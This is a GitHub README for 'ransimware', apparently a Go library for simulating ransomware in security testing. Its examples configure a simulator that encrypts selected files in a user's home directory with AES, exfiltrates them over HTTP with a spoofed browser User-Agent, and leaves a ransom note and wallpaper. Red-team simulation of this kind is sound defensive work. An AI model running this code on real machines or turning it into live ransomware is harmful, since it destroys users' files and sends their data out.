Skip to content

Simulate ransomware behavior and techniques.

License

Notifications You must be signed in to change notification settings

mjwhitta/ransimware

Repository files navigation

Ransimware

Yum

Go Report Card License

What is this?

This Go module allows you to simulate ransomware. Use https://ransomlook.io for ideas on domains and IOCs.

How to install

Open a terminal and run the following:

$ go get -u github.com/mjwhitta/ransimware

Usage

Minimal example:

package main

import (
    "os"
    "path/filepath"

    rw "github.com/mjwhitta/ransimware"
)

func main() {
    var e error
    var home string
    var sim *rw.Simulator

    // Try to get home directory
    if home, e = os.UserHomeDir(); e != nil {
        panic(e)
    }

    // Create simulator with 32 worker threads
    sim = rw.New(32)

    // Since no encrypt function is defined, the default behavior is
    // to do nothing

    // Since no exfil function is defined, the default behavior is to
    // do nothing

    // Since no notify function is defined, the default behavior is to
    // do nothing

    // Target the user's Desktop directory
    if e = sim.Target(filepath.Join(home, "Desktop")); e != nil {
        panic(e)
    }

    // Run the simulator
    if e = sim.Run(); e != nil {
        panic(e)
    }
}

More complex example:

package main

import (
    "os"
    "path/filepath"
    "strings"

    rw "github.com/mjwhitta/ransimware"
)

func main() {
    var e error
    var home string
    var sim *rw.Simulator

    // Try to get home directory
    if home, e = os.UserHomeDir(); e != nil {
        panic(e)
    }

    // Create simulator with 32 worker threads
    sim = rw.New(32)

    // Include interesting extensions
    sim.Include(`\.(avi|mkv|mov|mp[34]|mpeg4?|ogg|wav)$`) // vids
    sim.Include(`\.(bmp|gif|ico|jpe?g|png|tiff)$`)        // imgs
    sim.Include(`\.(docx|pptx|txt|xlsx|zip)$`)            // docs
    sim.Include(`\.(bat|ps1|xml)$`)                       // misc

    // Ignore directories
    sim.Exclude(`All\sUsers|AppData.Local|cache2.entries|Games`)
    sim.Exclude(
        `Local\sSettings|Low.Content\.IE5|Program(Data|\sFiles)`,
    )
    sim.Exclude(`Tor\sBrowser|User\sData.Default.Cache|Windows`)

    // Ignore AnyConnect cache/config
    sim.Exclude(`\.cisco|Cisco`)

    // Ignore extensions
    sim.Exclude(`\.(bin|dll|exe|in[fi]|lnk|ransimware|sys)$`)

    // Set encryption method to AES using provided helper function
    sim.Encrypt = rw.AESEncrypt("password")

    // Set exfil method to be HTTP using provided helper function
    sim.Exfil, e = rw.HTTPExfil(
        "http://localhost:8080",
        map[string]string{
            "User-Agent": strings.Join(
                []string{
                    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
                    "AppleWebKit/537.36 (KHTML, like Gecko)",
                    "Chrome/84.0.4147.105 Safari/537.36",
                },
                " ",
            ),
        },
    )
    if e != nil {
        panic(e)
    }

    // Notify user by changing wallpaper and leaving a ransom note,
    // using the provided helper functions
    sim.Notify = func() error {
        rw.RansomNote(
            filepath.Join(home, "Desktop", "ransomnote.txt"),
            "This is a ransomware simulation.",
        )()

        rw.WallpaperNotify(
            filepath.Join(home, "Desktop", "ransom.png"),
            rw.DefaultPNG,
            rw.DesktopStretch,
            false,
        )()

        return nil
    }

    // Target the user's home directory
    if e = sim.Target(home); e != nil {
        panic(e)
    }

    // Run the simulator
    if e = sim.Run(); e != nil {
        panic(e)
    }
}

Links

TODO

  • Provide more helper functions
    • FTP exfil

About

Simulate ransomware behavior and techniques.

Resources

License

Stars

Watchers

Forks